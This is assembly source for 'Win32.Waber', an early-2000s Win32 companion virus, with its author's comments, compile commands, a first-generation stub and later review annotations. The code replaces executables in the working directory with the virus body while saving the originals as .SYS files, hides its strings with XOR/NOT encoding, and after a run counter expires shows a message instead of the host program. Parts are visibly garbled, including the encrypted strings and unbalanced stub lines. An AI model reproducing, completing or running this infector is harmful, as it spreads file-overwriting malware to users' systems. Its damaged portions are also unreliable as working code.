; ================================================== =================================================================================================================================================================================
; ... :: win32.waber - virus :: ...
; Version 2.4
; By -DIA- (c) 02
; Germany
;
;
;
; Here it is! My 1st win32 companion virus ... Success !!! :)
; Don't grumble about the code, it's my 2nd Win32 virus ... and I go on. =)
; DIA_HATES_MACHINE@gmx.de
;
;
;
; Some comments:
; -Decrypt the strings
; -Read the counter -> does not exist = create it!
;    -> if not 0 = go to the virus and infect some files
;    -> if 0     = jmp to payload
; -Payload:
;    After 24 starts the payload activates.
;    It prints a nice message:
;    ...: WEED AND BEER RULEZ :...
;    Win32.Waber - Virus
;    Version 2.4
;    By -DIA- (c) 02
;    [Please reset the waber-counter: "c:\waber.dll"]
; -Virus copies each found .exe to a .sys file (the "companion")
; -Virus copies itself over the .exe file
; -After work the host runs!
; -Allright ...
;
;
; Greetz to monochrom - without you, this virus can't live :)
;
;
; To compile the Waber virus:
;   Tasm32 /z /ml /m3 Waber24,
;   TLINK32 -Tpe -c Waber24, Waber24, IMPORT32.LIB
;
; To compile the Waber SYS stub (first-generation "host"):
;   Tasm32 /z /ml /m3 Waber24Sys,
;   TLINK32 -Tpe -c Waber24Sys, Waber24Sys, IMPORT32.LIB
;   Rename Waber24Sys.exe Waber24.sys
; ================================================== ================================================== *********************************************************** ****************************************
***** Cut ***** waber24.sys ***************************************************** ***************************************
; --- waber24.sys: first-generation "host" stub -----------------------------
; Stand-alone program that is renamed to Waber24.sys and started by the
; infector (see Runhost below) when the virus body has no real host behind
; it. It only shows a message box and exits; it performs no infection.
; NOTE(review): as transcribed, several directive/code lines carry a stray
; leading ';' and the last DB line of MSG has an unbalanced quote. That is
; extraction damage, not the original layout; the stub does not assemble
; in this form and is kept here for reference only.
; .386
; .Model flat
Jumps
;
EXTRN MessageBoxa: Proc
EXTRN EXITPROCESS: Proc
;
;.data
Titel DB '1st generation', 0                     ; message-box caption
; MSG DB 'Win32.Waber - Virus', 10, 13            ; message-box text, LF/CR separated lines
; DB 'Version 2.4', 10, 13
DB 'By-Dia- (C) 02', 10, 13
DB '[My 1st Companion Virus in Win32], 0
;
; .code
Start:
;
Push 16                                          ; uType = 10h (MB_ICONHAND)
; Push Offset Titel                              ; lpCaption
PUSH OFFSET MSG                                  ; lpText
Push 0                                           ; hWnd = NULL
Call MessageBoxa
;
Push 0                                           ; uExitCode = 0
Call EXITPROCESS
;
; End Start
***** Cut ***** waber24.sys ***************************************************** ***************************************
*********************************************************** ************************************************
; ===== Have Fun ... ========================================= =====================================
.386
.MODEL FLAT
Jumps
EXTRN GETCOMMANDLINEA: PROC
EXTRN LSTRCPYA: Procextrn FindfirstFilea: Proc
EXTRN COPYFILEA: PROC
EXTRN FINDNEXTFILEA: PROC
EXTRN CREATEPROCESSA: PROC
EXTRN EXITPROCESS: PROC
EXTRN Messageboxa: Proc
EXTRN OpenFile: Proc
EXTRN CREATEFILEA: PROC
EXTRN WRITEFILE: PROC
EXTRN READFILE: PROC
EXTRN CLOSEHANDLE: PROC
EXTRN SETFILEPOINTER: PROC
.DATA
; --- Data ------------------------------------------------------------------
; FileName .. Filemask are stored encrypted and are decoded in place at
; start-up: 154 bytes beginning at FileName, each byte XOR 69 then NOT
; (see Decrypt). The bytes shown here are the encrypted form as mangled by
; extraction and cannot be read directly. From the header above, FileName
; is the run counter "c:\waber.dll" (an infection artefact worth looking
; for). Filemask is presumably "*.exe" - TODO confirm; the infection loop
; only treats matches as executables whose extension is replaced by SYS.
FileName DB '鶂骓埒 哞 斵 斵', -70
Titel DB '敂 敂 磉咿 磉咿 泛 泛 呷氲 呷氲 € €?, - 70
MSG DB '碛詨 垟碹 铓棜 铓棜?, - 80, -73
DB '爝 爝 詺垟 詺垟?, - 80, -73
DB '孛殚 麠殥 贀妶', -80, -73, -80, -73, -80, -73
DB '彡? 氲? 顨铗 氻埒哞 楖 纛 € € 骓 骓 埒 哞 斵 樼', -70
Firstnum db '?, - 70                             ; initial counter byte written on first run (encrypted here)
Filemask DB '悢 ?', - 70                          ; FindFirstFileA pattern (encrypted here)
Number DB 01D DUP (0)                            ; 1-byte counter read from / written to the counter file
FileAttr DD 0                                    ; passed to OpenFile as the OFSTRUCT; see note at the OpenFile call
FileHandle DD 0                                  ; handle of the counter file
Read DD 0                                        ; lpNumberOfBytesRead for ReadFile
Write DD 0                                       ; lpNumberOfBytesWritten for WriteFile
FindHandle DD 0                                  ; handle from FindFirstFileA
ProcessInfo DD 4 DUP (0)                         ; PROCESS_INFORMATION (16 bytes)
Startupinfo DD 4 DUP (0)                         ; NOTE(review): STARTUPINFOA is 68 bytes and cb is left 0; only
                                                 ; 16 bytes are reserved, so CreateProcessA reads into the fields below
Win32FindData DD 0, 0, 0, 0, 0, 0, 0, 0, 0, 0    ; start of the WIN32_FIND_DATAA buffer (40 bytes as transcribed)
Findfile DB 200 DUP (0)                          ; continuation of WIN32_FIND_DATAA; read as the found file name
                                                 ; NOTE(review): cFileName sits at offset 44 of WIN32_FIND_DATAA, i.e.
                                                 ; 4 bytes into Findfile - the DD count above may be transcription
                                                 ; damage; verify the layout before relying on it
CreateFile DB 200 DUP (0)                        ; found name with its extension replaced by "SYS" (companion)
VirusFile DB 200 DUP (0)                         ; own path, taken from the command line, cut after ".exe"
OrigInfile DB 200 DUP (0)                        ; own path with extension "SYS" = the saved original host
.code
Start:
; --- Entry point: decode strings, maintain the run counter, dispatch -------
; Flow (as visible below):
;   1. decode the 154 encrypted bytes starting at FileName in place;
;   2. open the counter file; if that fails, create it and seed it with
;      the Firstnum byte, then re-read it (Makefile -> GOON);
;   3. read one byte; if it is '0' run the payload (Boom) and exit WITHOUT
;      running the host; otherwise decrement the byte, write it back and
;      continue to the infection routine (Waber).
; All Win32 calls are stdcall: arguments are pushed right-to-left.
; ----- Decrypt All Strings -------------------------------------- ----------------------------
Mov ESI, Offset FileName                         ; source = destination: decode in place
Mov EDI, ESI
MOV ECX, 154D                                    ; 154 bytes = FileName .. Filemask
Call Decrypt
; ------------------------------------------------- ------------------------------------------
; ----- Check The Counter ----------------------------------------- ----------------------------
Push 2                                           ; uStyle = OF_READWRITE
Push Offset FileAttr                             ; lpReOpenBuff (OFSTRUCT, 136 bytes) - NOTE(review): only a DD is
                                                 ; reserved, so OpenFile writes over the data that follows FileAttr;
                                                 ; FileHandle is assigned afterwards, so the overwrite is survived
Push Offset FileName                             ; "c:\waber.dll" per the header
Call OpenFile
CMP EAX, 0FFFFFFFH                               ; failure check against HFILE_ERROR (constant as transcribed)
Je Makefile                                      ; counter file missing -> create it
Mov DWORD PTR [FileHandle], EAX
GOON:
Call setPointer                                  ; rewind to offset 0
PUSH 0                                           ; lpOverlapped = NULL
Push Offset Read                                 ; lpNumberOfBytesRead
Push 01D                                         ; nNumberOfBytesToRead = 1
Push Offset Number                               ; lpBuffer
Push DWORD PTR [FileHandle]
Call readfile
CMP BYTE PTR [Number], '0'                       ; counter exhausted?
Je Boom                                          ; yes -> payload
Dec Byte Ptr [Number]                            ; counter is a single ASCII character; step it down one code point
Call setPointer                                  ; rewind again before writing back
PUSH 0                                           ; lpOverlapped = NULL
Push Offset Write                                ; lpNumberOfBytesWritten
Push 01d                                         ; nNumberOfBytesToWrite = 1
Push Offset Number
Push DWORD PTR [FileHandle]
Call writefile
Push DWORD PTR [FileHandle]
Call Closehandle
JMP Waber                                        ; go infect, then run the host
Makefile: Push 0                                 ; hTemplateFile = NULL
Push 80h                                         ; dwFlagsAndAttributes = FILE_ATTRIBUTE_NORMAL
Push 2                                           ; dwCreationDisposition = CREATE_ALWAYS
PUSH 0                                           ; lpSecurityAttributes = NULL
PUSH 0                                           ; dwShareMode = 0
Push 0C0000000H                                  ; dwDesiredAccess = GENERIC_READ | GENERIC_WRITE
Push Offset FileName
Call Createfilea
Mov DWORD PTR [FileHandle], EAX                  ; NOTE(review): not checked; INVALID_HANDLE_VALUE is used as-is on failure
Call setPointer
PUSH 0
Push Offset Write
Push 01d                                         ; write the single seed byte Firstnum
Push Offset Firstnum
Push DWORD PTR [FileHandle]
Call writefile
JMP Goon                                         ; re-read and decrement the fresh counter
Boom:
; --- Payload: shown once the counter byte reaches '0'. The host is NOT
; started on this path (JMP EXIT below), so the original program appears
; to do nothing but show this box.
Push DWORD PTR [FileHandle]
Call Closehandle
Push 16                                          ; uType = 10h (MB_ICONHAND)
Push Offset Titel                                ; lpCaption (decoded above)
Push Offset MSG                                  ; lpText (decoded above)
PUSH 0                                           ; hWnd = NULL
Call Messageboxa
JMP EXIT
SetPointer:
; --- SetFilePointer(FileHandle, 0, NULL, FILE_BEGIN): rewind the counter
; file. Clobbers EAX and flags.
PUSH 0                                           ; dwMoveMethod = FILE_BEGIN
PUSH 0                                           ; lpDistanceToMoveHigh = NULL
PUSH 0                                           ; lDistanceToMove = 0
Push DWORD PTR [FileHandle]
Call setfilepointer
RET
; ------------------------------------------------- ------------------------------------------
; ----- Decrypt Loop -------------------------------------------------------------------------------------------------------------------- --------------------------------
Decrypt:
; --- In-place string decoder ---------------------------------------------
; In:  ESI = source, EDI = destination (the caller passes the same address),
;      ECX = byte count.
; Each byte becomes NOT (byte XOR 69). Advances ESI/EDI, leaves ECX = 0,
; clobbers AL and flags. ECX = 0 on entry would loop 4G times (LOOP
; decrements before testing); the only caller passes 154.
Lodsb
XOR Al, 69D
Not al
Stosb
Loop Decrypt
RET
; ------------------------------------------------- ------------------------------------------
; ----- Infect Some Filez ----------------------------------------- ----------------------------
Waber:
; --- Infection routine and host hand-off -----------------------------------
; 1. Derive the virus' own path from the command line and build the name of
;    its companion (same path, extension "SYS") in OrigInfile.
; 2. For every file matching Filemask in the current directory: copy it to
;    <name>.SYS (only if that does not exist yet) and then copy the virus'
;    own file over it.
; 3. Start the companion (the saved original host) and exit.
; Return values of lstrcpyA/CopyFileA/CreateProcessA are never checked.
; Indicators: *.sys siblings of each *.exe in the working directory.
Call getcommandlinea
Push EAX                                         ; lpString2 = full command line
Push Offset Virusfile                            ; lpString1 = VirusFile
Call lstrcpya
Mov Eax, Offset Virusfile
GetPoint1:
; Scan for the first '.' - no bounds check; with no '.' in the command line
; the scan runs past the 200-byte buffer.
CMP Byte Ptr [EAX], '.'
JZ FoundPoint1
INC EAX
JMP getPoint1
FoundPoint1:
Add Eax, 04D                                     ; skip ".exe" (4 chars) ...
MOV Byte Ptr [EAX], 00                           ; ... and cut the rest (closing quote, arguments)
Push Offset VirusFile 1                          ; as transcribed; presumably VirusFile+1 to skip a leading quote - TODO confirm
Push offset OrigInfile
Call lstrcpya
Mov Eax, Offset OrigInfile
GetPoint2:
CMP Byte Ptr [EAX], '.'
JZ FoundPoint2
INC EAX
JMP getPoint2
FoundPoint2:
INC EAX
Mov DWORD PTR [EAX], 535953H                     ; bytes 53 59 53 00 = "SYS",0 -> OrigInfile = own name with .sys
Push Offset Win32Finddata                        ; lpFindFileData (see buffer-size note in .DATA)
Push Offset Filemask                             ; lpFileName (decoded; presumably "*.exe")
Call FindfirstFilea
Mov DWORD PTR [FindHandle], EAX
FINDNEXT:
; EAX is the FindFirstFileA handle on the first pass and the FindNextFileA
; BOOL on later passes; both failure encodings are tested each time.
CMP EAX, -1                                      ; INVALID_HANDLE_VALUE
Je Runhost
OR EAX, EAX                                      ; FALSE from FindNextFileA = no more files
JZ Runhost
Push Offset Findfile                             ; found file name (cFileName, see .DATA note)
Push Offset Createfile
Call lstrcpya
Mov Eax, Offset Createfile
GetPoint3:
; First '.' again - a name with a dot before its extension is cut there.
CMP Byte Ptr [EAX], '.'
JZ FoundPoint3
INC EAX
JMP getPoint3
FoundPoint3: Inc EAX
Mov DWORD PTR [EAX], 535953H                     ; Createfile = <found>.SYS
Push 1                                           ; bFailIfExists = TRUE: do not clobber an existing companion
Push Offset Createfile                           ; lpNewFileName
Push Offset Findfile                             ; lpExistingFileName
Call Copyfilea                                   ; save the original executable as its .sys companion
PUSH 0                                           ; bFailIfExists = FALSE: overwrite
Push Offset Findfile                             ; lpNewFileName = the found executable
Push Offset VirusFile 1                          ; lpExistingFileName = the virus' own file (see note above)
Call Copyfilea                                   ; replace the executable with the virus body
Push Offset Win32Finddata
Push DWORD PTR [FindHandle]
Call FindnextFilea
JMP FindNext
Runhost:
; CreateProcessA(OrigInfile, OrigInfile, NULL, NULL, FALSE, 10h,
;                NULL, NULL, &Startupinfo, &ProcessInfo)
Push Offset ProcessInfo                          ; lpProcessInformation
Push Offset StartupInfo                          ; lpStartupInfo (undersized, cb = 0; see .DATA)
PUSH 0                                           ; lpCurrentDirectory = NULL
PUSH 0                                           ; lpEnvironment = NULL
Push 00000010h                                   ; dwCreationFlags = CREATE_NEW_CONSOLE
PUSH 0                                           ; bInheritHandles = FALSE
PUSH 0                                           ; lpThreadAttributes = NULL
PUSH 0                                           ; lpProcessAttributes = NULL
Push offset OrigInfile                           ; lpCommandLine
Push offset OrigInfile                           ; lpApplicationName = the saved host (.sys, still a PE)
Call CreateProcessa
EXIT:
PUSH 0                                           ; uExitCode = 0
Call EXITPROCESS
; -Weed - and - beer - rulez ----- DIA -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------
End Start
; ================================================== =================================================================================================================================================================================